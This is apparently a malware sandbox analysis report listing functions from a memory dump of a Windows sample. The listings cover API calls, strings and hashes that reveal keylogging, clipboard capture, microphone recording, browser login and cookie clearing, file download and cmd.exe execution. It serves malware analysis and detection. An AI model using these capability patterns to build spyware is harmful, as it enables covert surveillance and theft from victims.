open, xrefs: 0041612A
/C , xrefs: 0041610E

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659

Uniqueness

Uniqueness Score: -1.00%

Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
GetProcAddress.KERNEL32(00000000), ref: 0040141B

Strings

GetCursorInfo, xrefs: 0040140A
User32.dll, xrefs: 0040140F

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E

Uniqueness

Uniqueness Score: -1.00%

Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
GetProcAddress.KERNEL32(00000000), ref: 004014C0

Strings

User32.dll, xrefs: 004014B4
GetLastInputInfo, xrefs: 004014AF

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F

Uniqueness

Uniqueness Score: -1.00%

Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040C021
Sleep.KERNEL32(00001388), ref: 0040C0A9

Strings

Cleared browsers logins and cookies., xrefs: 0040C0F5
[Cleared browsers logins and cookies.], xrefs: 0040C0E4

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594

Sleep.KERNEL32(000001F4), ref: 0040A573
Sleep.KERNEL32(00000064), ref: 0040A5FD

Strings

[ , xrefs: 0040A58F
], xrefs: 0040A57B

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB

Uniqueness

Uniqueness Score: -1.00%

Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568

Uniqueness

Uniqueness Score: -1.00%

Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169

Uniqueness

Uniqueness Score: -1.00%

Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcess
String ID:
API String ID: 39102293-0
Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679

Uniqueness

Uniqueness Score: -1.00%

Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043987A

Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC

_UnwindNestedFrames.LIBCMT ref: 00439891
___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
CallCatchBlock.LIBVCRUNTIME ref: 004398C7

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 004193F0
GetSystemMetrics.USER32(0000004D), ref: 004193F6
GetSystemMetrics.USER32(0000004E), ref: 004193FC
GetSystemMetrics.USER32(0000004F), ref: 00419402

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785

Uniqueness

Uniqueness Score: -1.00%

Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B

Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F

Uniqueness

Uniqueness Score: -1.00%

Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00442CED

Strings

pow, xrefs: 00442CC5, 00442CE2

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F

Uniqueness

Uniqueness Score: -1.00%

Function 00449E3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
GetLastError.KERNEL32 ref: 00449F2B

Strings

PkGNG, xrefs: 00449E3E

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: PkGNG
API String ID: 203985260-263838557
Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 0040B797

Strings

[End of clipboard], xrefs: 0040B7D9
[Text copied to clipboard], xrefs: 0040B7E6

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12

Strings

ACP, xrefs: 00451B55
OCP, xrefs: 00451B8B

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C

Uniqueness

Uniqueness Score: -1.00%

Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
GetLastError.KERNEL32 ref: 0044B804

Strings

PkGNG, xrefs: 0044B733

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: PkGNG
API String ID: 442123175-263838557
Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
GetLastError.KERNEL32 ref: 0044B716

Strings

PkGNG, xrefs: 0044B654

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: PkGNG
API String ID: 442123175-263838557
Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040501F

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
Opcode Fuzzy Hash: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF

Uniqueness

Uniqueness Score: -1.00%

Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00416640
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: !D@
API String ID: 1931167962-604454484
Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C

Strings

alarm.wav, xrefs: 0041AD27
hYG, xrefs: 0041AD46

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$hYG
API String ID: 1174141254-2782910960
Opcode ID: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
Opcode Fuzzy Hash: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F

Uniqueness

Uniqueness Score: -1.00%

Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CloseHandle.KERNEL32(?), ref: 0040B0B4
UnhookWindowsHookEx.USER32 ref: 0040B0C7

Strings

Online Keylogger Stopped, xrefs: 0040B061, 0040B069, 0040B090

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE

Uniqueness

Uniqueness Score: -1.00%

Function 00448BB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24

Strings

LCMapStringEx, xrefs: 00448BCE
PkGNG, xrefs: 00448BB5

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx$PkGNG
API String ID: 2568140703-1065776982
Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99

Uniqueness

Uniqueness Score: -1.00%

Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F

Strings

XMG, xrefs: 004017F8

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: XMG
API String ID: 2315374483-813777761
Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32

Strings

IsValidLocaleName, xrefs: 00448AF7, 00448B01
JD, xrefs: 00448B29, 00448B16

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$JD
API String ID: 1901932003-2234456777
Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E

Uniqueness

